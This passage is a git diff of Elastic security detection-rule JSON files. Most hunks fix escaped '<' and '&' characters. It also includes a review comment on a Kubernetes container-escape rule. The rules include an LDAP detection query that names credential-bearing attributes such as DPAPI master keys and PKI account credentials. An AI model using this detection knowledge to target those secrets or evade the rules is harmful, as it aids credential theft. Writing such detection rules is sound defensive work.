+ "rule_id": "764c8437-a581-4537-8060-1fdb0e92c92d",
+ "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.",
+ "severity": "medium",
+ "tags": [
+ "Data Source: Kubernetes",
+ "Tactic: Execution",
+ "Tactic: Privilege Escalation"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0004",
+ "name": "Privilege Escalation",
+ "reference": "https://attack.mitre.org/tactics/TA0004/"
+ },
+ "technique": [
+ {
+ "id": "T1611",
+ "name": "Escape to Host",
+ "reference": "https://attack.mitre.org/techniques/T1611/"
+ }
+ ]
+ },
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0002",
+ "name": "Execution",
+ "reference": "https://attack.mitre.org/tactics/TA0002/"
+ },
+ "technique": [
+ {
+ "id": "T1610",
+ "name": "Deploy Container",
+ "reference": "https://attack.mitre.org/techniques/T1610/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "query",
+ "version": 203
+ },
+ "id": "764c8437-a581-4537-8060-1fdb0e92c92d_203",
+ "type": "security-rule"
+}
\ No newline at end of file
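Review bot: The `false_positives` guidance in this new rule names the exception field as `kubernetes.audit.requestObject.spec.container.image` (singular), while the query and `required_fields` both use `kubernetes.audit.requestObject.spec.containers.image`, so an exception built from the documented name would silently match nothing; it should read `\"kubernetes.audit.requestObject.spec.containers.image\"`. The query's own exclusion is pinned to the single tag `docker.elastic.co/beats/elastic-agent:8.4.0`, so any other agent release that sets hostIPC will alert until the rule is revised, and an image-string exclusion is not a verified identity — scoping the exception by namespace or service account, or matching an image digest, would be more robust for operators tuning this rule. `note` is emitted as an empty string even though the rule carries prerequisites in `setup`; either populate it with the same guidance or drop the key so the two fields do not disagree about whether there is anything to read.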
diff --git a/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_4.json b/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_4.json index a52fcbfed8b..7c03984dde6 100644 --- a/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_4.json +++ b/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_4.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Access to a Sensitive LDAP Attribute", - "note": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```", + "note": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```", "query": "any where host.os.type == \"windows\" and event.action == \"Directory Service Access\" and event.code == \"4662\" and\n\n not winlog.event_data.SubjectUserSid : \"S-1-5-18\" and\n\n winlog.event_data.Properties : (\n /* unixUserPassword */\n \"*612cb747-c0e8-4f92-9221-fdd5f15b550d*\",\n\n /* ms-PKI-AccountCredentials */\n \"*b8dfa744-31dc-4ef1-ac7c-84baf7ef9da7*\",\n\n /* ms-PKI-DPAPIMasterKeys */\n \"*b3f93023-9239-4f7c-b99c-6745d87adbc2*\",\n\n /* msPKI-CredentialRoamingTokens */\n \"*b7ff5a38-0818-42b0-8110-d3d154c97f24*\"\n ) and\n\n /*\n Excluding noisy AccessMasks\n 0x0 undefined and 0x100 Control Access\n https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662\n */\n not winlog.event_data.AccessMask in (\"0x0\", \"0x100\")\n", "references": [ "https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", 
diff --git a/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_5.json b/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_5.json index d9e2424632e..d0ac355c285 100644 --- a/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_5.json +++ b/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_5.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Access to a Sensitive LDAP Attribute", - "note": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```", + "note": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```", "query": "any where event.action == \"Directory Service Access\" and event.code == \"4662\" and\n\n not winlog.event_data.SubjectUserSid : \"S-1-5-18\" and\n\n winlog.event_data.Properties : (\n /* unixUserPassword */\n \"*612cb747-c0e8-4f92-9221-fdd5f15b550d*\",\n\n /* ms-PKI-AccountCredentials */\n \"*b8dfa744-31dc-4ef1-ac7c-84baf7ef9da7*\",\n\n /* ms-PKI-DPAPIMasterKeys */\n \"*b3f93023-9239-4f7c-b99c-6745d87adbc2*\",\n\n /* msPKI-CredentialRoamingTokens */\n \"*b7ff5a38-0818-42b0-8110-d3d154c97f24*\"\n ) and\n\n /*\n Excluding noisy AccessMasks\n 0x0 undefined and 0x100 Control Access\n https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662\n */\n not winlog.event_data.AccessMask in (\"0x0\", \"0x100\")\n", "references": [ "https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", 
diff --git a/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_6.json b/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_6.json index 989ee14b94a..d0ac85d676e 100644 --- a/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_6.json +++ b/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_6.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Access to a Sensitive LDAP Attribute", - "note": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```", + "note": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```", "query": "any where event.action == \"Directory Service Access\" and event.code == \"4662\" and\n\n not winlog.event_data.SubjectUserSid : \"S-1-5-18\" and\n\n winlog.event_data.Properties : (\n /* unixUserPassword */\n \"*612cb747-c0e8-4f92-9221-fdd5f15b550d*\",\n\n /* ms-PKI-AccountCredentials */\n \"*b8dfa744-31dc-4ef1-ac7c-84baf7ef9da7*\",\n\n /* ms-PKI-DPAPIMasterKeys */\n \"*b3f93023-9239-4f7c-b99c-6745d87adbc2*\",\n\n /* msPKI-CredentialRoamingTokens */\n \"*b7ff5a38-0818-42b0-8110-d3d154c97f24*\"\n ) and\n\n /*\n Excluding noisy AccessMasks\n 0x0 undefined and 0x100 Control Access\n https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662\n */\n not winlog.event_data.AccessMask in (\"0x0\", \"0x100\")\n", "references": [ "https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", 
diff --git a/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_7.json b/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_7.json index bb949352bd9..68ac8b899af 100644 --- a/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_7.json +++ b/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_7.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Access to a Sensitive LDAP Attribute", - "note": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Access (Success,Failure)\n```", + "note": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```", "query": "any where event.action == \"Directory Service Access\" and event.code == \"4662\" and\n\n not winlog.event_data.SubjectUserSid : \"S-1-5-18\" and\n\n winlog.event_data.Properties : (\n /* unixUserPassword */\n \"*612cb747-c0e8-4f92-9221-fdd5f15b550d*\",\n\n /* ms-PKI-AccountCredentials */\n \"*b8dfa744-31dc-4ef1-ac7c-84baf7ef9da7*\",\n\n /* ms-PKI-DPAPIMasterKeys */\n \"*b3f93023-9239-4f7c-b99c-6745d87adbc2*\",\n\n /* msPKI-CredentialRoamingTokens */\n \"*b7ff5a38-0818-42b0-8110-d3d154c97f24*\"\n ) and\n\n /*\n Excluding noisy AccessMasks\n 0x0 undefined and 0x100 Control Access\n https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662\n */\n not winlog.event_data.AccessMask in (\"0x0\", \"0x100\")\n", "references": [ "https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", 
diff --git a/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_8.json b/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_8.json index 321b489e39b..309300132d3 100644 --- a/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_8.json +++ b/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_8.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Access to a Sensitive LDAP Attribute", - "note": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Access (Success,Failure)\n```", + "note": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```", "query": "any where event.action == \"Directory Service Access\" and event.code == \"4662\" and\n\n not winlog.event_data.SubjectUserSid : \"S-1-5-18\" and\n\n winlog.event_data.Properties : (\n /* unixUserPassword */\n \"*612cb747-c0e8-4f92-9221-fdd5f15b550d*\",\n\n /* ms-PKI-AccountCredentials */\n \"*b8dfa744-31dc-4ef1-ac7c-84baf7ef9da7*\",\n\n /* ms-PKI-DPAPIMasterKeys */\n \"*b3f93023-9239-4f7c-b99c-6745d87adbc2*\",\n\n /* msPKI-CredentialRoamingTokens */\n \"*b7ff5a38-0818-42b0-8110-d3d154c97f24*\"\n ) and\n\n /*\n Excluding noisy AccessMasks\n 0x0 undefined and 0x100 Control Access\n https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662\n */\n not winlog.event_data.AccessMask in (\"0x0\", \"0x100\")\n", "references": [ "https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", 
@@ -99,7 +99,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_9.json b/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_9.json index f0b39863788..27ea8045fbe 100644 --- a/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_9.json +++ b/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_9.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66", - "setup": "\nThe 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Access (Success,Failure)\n```\n", + "setup": "\nThe 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", 
diff --git a/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_103.json b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_103.json index 9de296eec2f..d82a9cb624b 100644 --- a/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_103.json +++ b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_103.json @@ -46,7 +46,7 @@ ], "risk_score": 47, "rule_id": "766d3f91-3f12-448c-b65f-20123e9e9e8c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_104.json b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_104.json index a356f7946ad..7c094fea97c 100644 --- a/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_104.json +++ b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_104.json 
@@ -46,7 +46,7 @@ ], "risk_score": 47, "rule_id": "766d3f91-3f12-448c-b65f-20123e9e9e8c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_105.json b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_105.json index 227fc6878d4..83321719a4a 100644 --- a/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_105.json +++ b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_105.json 
@@ -46,7 +46,7 @@
 ],
 "risk_score": 47,
 "rule_id": "766d3f91-3f12-448c-b65f-20123e9e9e8c",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_106.json b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_106.json
index d076b8c3a9e..321ca0ed462 100644
--- a/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_106.json
@@ -14,7 +14,7 @@ "license": "Elastic License v2", "max_signals": 33, "name": "Creation of Hidden Shared Object File", - "note": "### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).", + "note": "### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).", "query": "file where host.os.type == \"linux\" and event.type == \"creation\" and file.extension == \"so\" and file.name : \".*.so\"\n", "related_integrations": [ { @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_107.json b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_107.json index d899faf447a..ddbfbda74ff 100644 --- a/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_107.json +++ b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_107.json 
@@ -45,7 +45,7 @@ ], "risk_score": 47, "rule_id": "766d3f91-3f12-448c-b65f-20123e9e9e8c", - "setup": "\nThis rule requires data coming in either from Elastic Defend, or Auditbeat integration.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "setup": "\nThis rule requires data coming in either from Elastic Defend, or Auditbeat integration.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
